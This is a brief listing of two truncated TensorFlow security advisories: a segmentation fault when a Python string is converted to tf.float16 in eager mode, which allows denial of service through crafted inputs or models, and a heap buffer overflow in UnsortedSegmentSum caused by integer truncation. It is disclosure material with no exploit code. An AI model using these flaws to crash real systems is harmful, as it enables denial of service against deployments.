Segmentation faultin TensorFlow when converting a Python string to `tf.float16`

Converting a string (from Python) to a tf.float16 value results in a segmentation fault in eager mode as the format checks for this use case are only in the graph mode. This issue can lead to denial of service in inference/training where a malicious attacker can send a data point which contains a string instead of a tf.float16 value. Similar effects can be obtained by manipulating saved models and checkpoints …

2019

Heap buffer overflow in `UnsortedSegmentSum` in TensorFlow

A heap buffer overflow in UnsortedSegmentSum can be produced when the Index template argument is int32. In this case data_size and num_segments fields are truncated from int64 to int32 and can produce negative numbers, resulting in accessing out of bounds heap memory. This is unlikely to be exploitable and was detected and fixed internally. We are making the security advisory only to notify users that it is better to update …